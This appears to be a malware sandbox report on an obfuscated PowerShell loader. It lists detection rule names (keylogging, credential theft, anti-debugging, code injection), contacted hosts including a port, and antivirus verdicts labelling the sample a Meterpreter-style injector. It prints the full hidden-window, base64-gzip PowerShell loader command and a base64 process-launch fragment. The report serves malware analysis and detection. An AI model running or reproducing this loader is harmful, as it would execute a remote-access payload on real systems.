YQAzAEgAUwBnAHUAZgBZAHIAagBQADgARABmADkARwBTAE0ARwAyAEMAdwBBAEEAJwAnACkALQBmACcAJwB0ACcAJwAsACcAJwBwACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
host | 131.153.76.130 | |||
host | 193.117.208.148 |
parent_process | powershell.exe | martian_process | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAF6Ab2QCA7VW+2/aSBD+vVL/B6{0}Csq0SbB59JFKlW9sxkACB8Iai08ZezIa1l9hLwO31f79ZwCG5Jr3cS'+'bVEso+Z2dlvv{1}nZ+TryBOWRwof'+'K97dvlMPXxjE'+'OFS1H+mleyaW{0}ja8fN3P+lm+VL4o2RauVw0NMo9nZmb2OYxKJ/bxQJQIlCQlvGCWJ{1}i{0}/KcMFicnJ1c0{0}8YTyXcn9WagyfoPZQSy1sbcgygmKfLnX4B6WfhW6K0aF{1}n79qurTk+KscH63xizR1G6aCBIWfMZUXfmhywN76Y{1}oa{1}N6MU/4XBSGNCqXCv0owXPSAmv3{1}EnEgvuJC{1}c5XicmYh1H+1{0}JM3shTYVhO+Ye8v2YJImaV6bygOls9oc2PZx+vY4EDUmhHgkS81WXxPfUI0mhhiOfkWsyn4FWV8Q0Cma6DmL3fEm0XLRmLK/8FzNai2wy7F6r{1}D1WAqm2iPU8xPSZeza5v2Zkr6k'+'+46jkgQ5fxgXA74eEcJ6xJ2TONXmG'+'QMeF7Jvudgj'+'4rLV5QnfaXx'+'QzrzThdC'+'x4n'+'MI0'+'14vXRJ89IK7k{0}uY4/1{1'+'}jxUwT9NIGLEwHnPqzo/qT8OfSyK1KoZfJ7JA5jYiTRjikXsZX7bmYkDkjO0QKmVgL/NPUwwbxHcJIgIVEWVLjJ7XzkIoHXW{0}NmU9i5EFcE/AKQq4/dWYfOE2{0}R00SAnb7OXA1N4csIZn0ITPS7HQ'+'5ByHVZjhJ8k{1}7DWnq5ZUuwYz4eQVFCT1sobXgu6F6dLe5ZoJ6OBGZuZn+DzgPx9o8SkS89iCqAEGvuyIexUwikldq1CdW2qVBdrz6LB42ZgyyByzdQzxgReLQFZIrMXgqeaEXukTUwxUjIYjsqobLcAA14{1}AiO27hgPjqC35mmbCnvQQmQ+SRlxD{0}LuMirwxoLKAGSZDTxv9x4efSs/PFjskhNFqWX1MrFZL/OXwZkq4k6QGhHR6xACzcmIcWT'+'sjHyr7OaO+MK9{1}G8I3rEWv6F0{0}arG/g14Rf3/nkX17c1gxarvOmZyf{0}qvsZ0U2w8T63kOdf+OS0C3K'+'dQUXYbVTrUNOqLDzL7MG4XxfjOqr1qBmMFx4z2+fLr'+'VFJTLq{1}DZueY33blBKgaqVSG5moXK5clc0loDemxWCJ/FZIN9sGjKGgXjWsemKZdXZ+YV/fDEvuZMhqRsVdzIc86X4cO4ZhnPrYaaYIWdwvN9NR8Zr3al5oVSJunNqVJT{1}HyI7OB67FL8dWjNrGAAcrvhmNOqwa2Mj6UKFk0um7VqfjWqhfvb1zTo3'+'AOB2O8MIaDk{1}0sh{'+'1}dL2DubmqdS8Os1H3yjU82AFyVIxxcg0xgl7zFHGSc98h63+JJCS8{0}jiyQcSd3qLoYr9w2g/1ev8TRgLVGGDUmqWsYxXG7gmomH1YD1AFxHFgdjJJ7'+'55{0}jFAc+94cfWuO5MRixT4Zjd9qLkbyzsQrl303NufQmx'+'Y139elzY0gHIUd9wxi8A1ZM+zQS5dIsF57Lqvn2TS66KT/ixU{0}NoYnjZIEZ8AWqfZa2Lo/dQwFvcyo1NA2eAUsSR4RB54Tem{1}EdMcY92T32hR5a176hyP7Wr+9cem6kKw+C+rG{0}ZE{0}nZxNwEjJox+5Cg0SBWOTNbdk0oR+YW7OyS5bX383mq1TbW8vLliLBeTDPdubBI{1}0rmva7AYOXg4AS9g'+'vIXkIPjl5CzYEauC8FEkOLc/YYwf3FHsjwBD8Argh3n8{1}nA9AE9E/InZITsqM+7{0}C51HF+J3MO5WwB//x/Zc5x7Re7r2KTmd+B89Pq04VHjeC3ATDEVIBcF4oyI/{0}3wgs4HJLlUXwhN{1}AI88Mnn89Xa3HSgufYrjP8Df9GSMG2CwAA')-f't','p')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
dead_host | 193.117.208.148:7800 |
CAT-QuickHeal | Script.Trojan.42447 |
McAfee | PS/Injector.d |
ALYac | Trojan.Script.905440 |
VIPRE | Trojan.Script.905440 |
Sangfor | Trojan.Generic-Script.Save.4c97a2d4 |
Arcabit | Trojan.Script.DDD0E0 |
Symantec | Meterpreter |
ESET-NOD32 | PowerShell/Agent.WO |
Avast | VBS:Obfuscated-GQ [Cryp] |
Cynet | Malicious (score: 99) |
Kaspersky | Trojan.BAT.Agent.arf |
BitDefender | Trojan.Script.905440 |
NANO-Antivirus | Trojan.Text.Downloader.fqlyhy |
MicroWorld-eScan | Trojan.Script.905440 |
Emsisoft | Trojan.Script.905440 (B) |
F-Secure | Trojan.TR/PowerShell.Gen |
DrWeb | PowerShell.DownLoader.36 |
McAfee-GW-Edition | PS/Injector.d |
FireEye | Trojan.Script.905440 |
Sophos | Mal/PSDL-B |
Ikarus | Trojan-Dropper.PowerShell.Ploty |
Avira | TR/PowerShell.Gen |
Xcitium | TrojWare.VBS.Agent.NUI@8a4oj4 |
ZoneAlarm | Trojan.BAT.Agent.arf |
GData | Trojan.Script.905440 |
Detected | |
AhnLab-V3 | BAT/Agent |
Tencent | Unk.Win32.Script.403896 |
MAX | malware (ai score=80) |
Fortinet | PowerShell/Agent.D!tr |
AVG | VBS:Obfuscated-GQ [Cryp] |